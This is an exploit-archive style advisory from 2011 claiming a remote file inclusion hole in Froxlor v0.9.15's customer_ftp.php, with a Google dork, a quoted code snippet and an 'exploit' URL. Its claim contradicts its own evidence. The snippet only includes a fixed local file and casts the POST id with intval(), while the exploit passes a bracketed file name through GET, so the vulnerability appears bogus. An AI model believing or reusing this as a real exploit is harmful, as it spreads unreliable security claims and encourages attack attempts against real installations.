
# Title : Froxlor v 0.9.15 Remote File Inclusion Vulnerability
# Published : 2011-01-26
# Author : DIES3L


# Exploit Title: Froxlor v 0.9.15 Remote file include vulnerability
# Google Dork: © 2009-2010 by the Froxlor Team
# Date: 26/1/2011
# Author: DIES3L
# Software Link: http://www.froxlor.org
# Version: v 0.9.15
# Tested on: ubuntu + win7
# Email : zxn@Hotmail.com
#######################################################

File : customer_ftp.php
http://localhost/[path]/customer_ftp.php

Code :
<?php
require ("./lib/init.php");

$id = intval($_POST['id']);
?>

Exploit :
http://127.0.0.1/[path]/customer_ftp.php?id= [ DIES3L.txt ]
NOTE :-
** ONLY FOR PHP 4.x.x

Have Enjoy :)
